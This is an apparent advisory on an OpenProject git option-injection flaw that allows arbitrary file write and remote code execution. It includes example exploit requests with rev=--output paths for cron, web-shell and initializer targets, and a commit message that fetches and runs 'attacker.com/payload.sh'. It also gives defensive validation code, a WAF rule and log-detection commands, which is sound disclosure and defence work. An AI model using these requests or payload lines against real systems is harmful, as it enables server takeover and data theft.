Description
OpenProject is an open-source, web-based project management software. Prior to versions 16.6.7 and 17.0.3, an arbitrary file write vulnerability exists in OpenProject’s repository changes endpoint (/projects/:project_id/repository/changes) when rendering the “latest changes” view via git log. By supplying a specially crafted rev value (for example, rev=--output=/tmp/poc.txt), an attacker can inject git log command-line options. When OpenProject executes the SCM command, Git interprets the attacker-controlled rev as an option and writes the output to an attacker-chosen path. As a result, any user with the :browse_repository permission on the project can create or overwrite arbitrary files that the OpenProject process user is permitted to write. The written contents consist of git log output, but by crafting custom commits the attacker can still upload valid shell scripts, ultimately leading to RCE. The RCE lets the attacker create a reverse shell to the target host and view confidential files outside of OpenProject, such as /etc/passwd. This issue has been patched in versions 16.6.7 and 17.0.3.
EPSS Score:
0%
EUVD-2026-5556: Critical Command Injection Vulnerability in OpenProject
Executive Summary
EUVD-2026-5556 represents a critical command injection vulnerability in OpenProject's repository management functionality that enables arbitrary file write operations and remote code execution (RCE). With a CVSS 4.0 base score of 9.4 (Critical), this vulnerability poses a severe threat to organizations utilizing OpenProject for project management, particularly within European infrastructure.
1. Vulnerability Assessment and Severity Evaluation
Technical Classification
- Vulnerability Type: Command Injection / Arbitrary File Write
- CWE Classification: CWE-77 (Command Injection), CWE-73 (External Control of File Name or Path)
- CVSS 4.0 Score: 9.4 (Critical)
- Attack Complexity: Low (AC:L)
- Privileges Required: Low (PR:L) - Only :browse_repository permission needed
Severity Justification
The critical severity rating is warranted due to:
- Low Attack Complexity: Exploitation requires only basic repository browsing permissions
- Complete System Compromise: Full confidentiality, integrity, and availability impact (VC:H/VI:H/VA:H)
- Subsequent System Impact: High impact on subsequent systems (SC:H/SI:H/SA:H)
- Network Attack Vector: Remotely exploitable without user interaction (AV:N/UI:N)
- RCE Capability: Direct path to remote code execution and reverse shell establishment
Risk Context
This vulnerability is particularly dangerous because:
- It affects a widely-deployed open-source project management platform
- The attack surface is exposed to any authenticated user with minimal permissions
- Exploitation can lead to complete infrastructure compromise
- The vulnerability allows lateral movement and data exfiltration beyond the application scope
2. Potential Attack Vectors and Exploitation Methods
Attack Chain Analysis
Stage 1: Initial Access
Attacker Requirements:
- Valid OpenProject account
- :browse_repository permission on any project
- Network access to the OpenProject instance
Stage 2: Command Injection
The vulnerability exists in the repository changes endpoint:
/projects/:project_id/repository/changes
Exploitation Mechanism:
# Malicious request example
GET /projects/vulnerable-project/repository/changes?rev=--output=/tmp/malicious.sh
# Git command executed by OpenProject
git log --output=/tmp/malicious.sh [other parameters]
The rev parameter is insufficiently sanitized, allowing injection of git command-line options.
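The defensive counterpart, as an added example that is not OpenProject's own patch: reject any rev that could be parsed as an option, and hand git an argv array with --end-of-options so nothing user-controlled reaches option parsing. Repository path and helper names are assumptions for illustration.

```ruby
require "open3"

# Added example (not OpenProject's code): validate a user-supplied "rev"
# before it reaches git, and invoke git with an argv array plus
# "--end-of-options" so nothing user-controlled can be parsed as an option.
# Valid ref names and SHAs never start with "-", so rejecting that prefix
# loses no legitimate input. Paths and helper names here are illustrative.

class InvalidRevision < ArgumentError; end

# Allowlist: an abbreviated/full hex SHA, or a ref name built from safe
# characters (a simplified form of git's check-ref-format rules).
REV_PATTERN = %r{\A(?:[0-9a-f]{4,40}|[A-Za-z0-9][A-Za-z0-9._/-]{0,254})\z}

def validate_rev(rev)
  rev = rev.to_s
  raise InvalidRevision, "revision must not be empty" if rev.empty?
  raise InvalidRevision, "revision may not start with '-'" if rev.start_with?("-")
  raise InvalidRevision, "revision contains '..' or control characters" if rev.include?("..") || rev.match?(/[[:cntrl:]]/)
  raise InvalidRevision, "revision has unexpected characters" unless rev.match?(REV_PATTERN)
  rev
end

# argv form: no shell involved, and "--end-of-options" (git >= 2.24) stops
# option parsing, so even a rev that slipped past validation cannot become a flag.
def git_log_argv(repo_path, rev, limit: 20)
  ["git", "-C", repo_path, "log", "--no-color", "-n", limit.to_s,
   "--end-of-options", validate_rev(rev), "--"]
end

def latest_changes(repo_path, rev)
  out, err, status = Open3.capture3(*git_log_argv(repo_path, rev))
  raise "git log failed: #{err}" unless status.success?
  out
end

if $PROGRAM_NAME == __FILE__
  ["main", "v1.2.0", "--output=/tmp/poc.txt"].each do |rev|
    p git_log_argv("/srv/repo.git", rev) # /srv/repo.git is a placeholder path
  rescue InvalidRevision => e
    puts "rejected #{rev.inspect}: #{e.message}"
  end
end
```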
Stage 3: Arbitrary File Write
By controlling the --output flag, attackers can:
- Write files to any location accessible to the OpenProject process user
- Overwrite existing configuration files
- Place malicious scripts in executable directories
- Modify application code or templates
Stage 4: Content Crafting
While the written content is git log output, attackers can:
# Create specially crafted commits with malicious payloads
git commit -m "#!/bin/bash
curl attacker.com/payload.sh | bash
# Legitimate-looking commit message"
The git log output containing these commit messages becomes valid shell script content.
Stage 5: Remote Code Execution
Method 1: Cron Job Injection
# Write to cron directory
rev=--output=/etc/cron.d/malicious
Method 2: Web Shell Deployment
# Write to web-accessible directory
rev=--output=/var/www/openproject/public/shell.php
Method 3: Process Hijacking
# Overwrite startup scripts or configuration files
rev=--output=/opt/openproject/config/initializers/malicious.rb
Stage 6: Post-Exploitation
Once RCE is achieved:
- Establish reverse shell connection
- Enumerate system information (/etc/passwd, /etc/shadow)
- Access database credentials
- Pivot to connected systems
- Exfiltrate sensitive project data
- Establish persistence mechanisms
Practical Exploitation Scenario
POST /projects/target-project/repository/changes HTTP/1.1
Host: openproject.victim.eu
Cookie: _openproject_session=<valid_session>
Content-Type: application/x-www-form-urlencoded
rev=--output=/tmp/stage1.sh
# Subsequent request after crafting malicious commits
# The git log output now contains executable shell code
# Attacker triggers execution through various methods
3. Affected Systems and Software Versions
Vulnerable Versions
OpenProject versions affected:
- All versions < 16.6.7 (Legacy branch)
- All versions < 17.0.3 (Current branch)
Specific Version Ranges
Vulnerable:
- 16.0.0 - 16.6.6
- 17.0.0 - 17.0.2
- All earlier versions
Patched:
- 16.6.7 and later (16.x branch)
- 17.0.3 and later (17.x branch)
Deployment Scenarios at Risk
- Self-hosted Installations: Organizations running OpenProject on-premises
- Docker Deployments: Containerized instances with vulnerable versions
- Cloud Deployments: IaaS/PaaS hosted instances
- Development Environments: Often overlooked but equally vulnerable
European Infrastructure Impact
Given OpenProject's popularity in European organizations:
- Public Sector: Government agencies using OpenProject for project coordination
- Critical Infrastructure: Energy, transportation, and healthcare sectors
- Research Institutions: Universities and research facilities
- SMEs: Small and medium enterprises across EU member states
4. Recommended Mitigation Strategies
Immediate Actions (Priority 1 - Within 24 Hours)
1. Version Upgrade
# For version 16.x users
Upgrade to: OpenProject 16.6.7 or later
# For version 17.x users
Upgrade to: OpenProject 17.0.3 or later
Upgrade Resources:
- Release v16.6.7: https://github.com/opf/openproject/releases/tag/v16.6.7
- Release v17.0.3: https://github.com/opf/openproject/releases/tag/v17.0.3
2. Emergency Workarounds (If immediate patching is not possible)
Option A: Disable Repository Functionality
# In config/configuration.yml
scm:
  disabled: true
Option B: Restrict Repository Permissions
-- Temporarily revoke :browse_repository permission
UPDATE role_permissions
SET permission = NULL
WHERE permission = 'browse_repository';
Option C: Web Application Firewall (WAF) Rules
# Nginx/ModSecurity rule example: a rev beginning with "-" is an option, never a valid ref,
# so anchoring on the leading dash also catches single-dash options and avoids false
# positives on ref names that merely contain "--"
SecRule ARGS:rev "@rx ^-" \
    "id:1000,\
    phase:2,\
    deny,\
    status:403,\
    msg:'Potential command injection in rev parameter'"
Short-term Actions (Priority 2 - Within 72 Hours)
3. Security Audit
- Review access logs for suspicious rev parameter patterns:
grep -E "rev=--" /var/log/openproject/production.log
grep -E "repository/changes.*--output" /var/log/nginx/access.log
- Check for unauthorized file modifications:
find /opt/openproject -type f -mtime -30 -ls
find /tmp -name "*.sh" -mtime -7 -ls
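The grep on the web-server access log above matches only the literal rev=--, so a percent-encoded value such as rev=%2D%2Doutput=... slips past it. The following is an added detection example, not part of the advisory, that decodes the query string before checking; the log lines are constructed samples.

```ruby
require "cgi"

# Added detection example (not from the advisory): scan access-log lines for
# requests to the repository changes endpoint whose "rev" parameter, after
# URL-decoding, starts with "-". Sample log lines below are constructed.

CHANGES_PATH = %r{/projects/[^/\s?]+/repository/changes}

# Extract the decoded rev values from a request target's query string.
def rev_values(request_target)
  _, query = request_target.split("?", 2)
  return [] unless query
  CGI.parse(query).fetch("rev", []) # CGI.parse percent-decodes values
end

# Any rev that starts with a dash is an option, never a valid git ref.
def suspicious_rev?(rev)
  rev.start_with?("-")
end

# Parse combined-format lines: method and target sit in the quoted request field.
def scan_log(lines)
  lines.each_with_object([]) do |line, hits|
    m = line.match(%r{"(?<method>[A-Z]+) (?<target>\S+) HTTP/[\d.]+"}) or next
    next unless m[:target].match?(CHANGES_PATH)
    bad = rev_values(m[:target]).select { |r| suspicious_rev?(r) }
    hits << { line: line, rev: bad.first } unless bad.empty?
  end
end

# Constructed sample log lines (not real traffic); the third one is the
# percent-encoded form that a plain "rev=--" grep would miss.
SAMPLE_LOG = [
  '10.0.0.5 - - [01/Mar/2026:10:00:00 +0000] "GET /projects/demo/repository/changes?rev=main HTTP/1.1" 200 512',
  '10.0.0.9 - - [01/Mar/2026:10:00:03 +0000] "GET /projects/demo/repository/changes?rev=--output=/tmp/x.sh HTTP/1.1" 200 98',
  '10.0.0.9 - - [01/Mar/2026:10:00:04 +0000] "GET /projects/demo/repository/changes?rev=%2D%2Doutput%3D%2Ftmp%2Fy.sh HTTP/1.1" 200 98',
  '10.0.0.7 - - [01/Mar/2026:10:00:05 +0000] "GET /projects/demo/work_packages?rev=--x HTTP/1.1" 200 1024',
].freeze

if $PROGRAM_NAME == __FILE__
  scan_log(SAMPLE_LOG).each { |h| puts "ALERT rev=#{h[:rev].inspect}: #{h[:line]}" }
end
```

Only the two requests to the changes endpoint are flagged; the fourth line hits a different endpoint and is ignored.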
4. Incident Response Procedures
- Isolate potentially compromised instances
- Conduct forensic analysis of affected systems
- Review user accounts with :browse_repository permissions
- Analyze git commit history for suspicious patterns
5. Access Control Review
-- Audit users with repository access
SELECT u.login, r.name, p.name
FROM users u
JOIN member_roles mr ON u.id = mr.member_id
JOIN roles r ON mr.role_id = r.id
JOIN role_permissions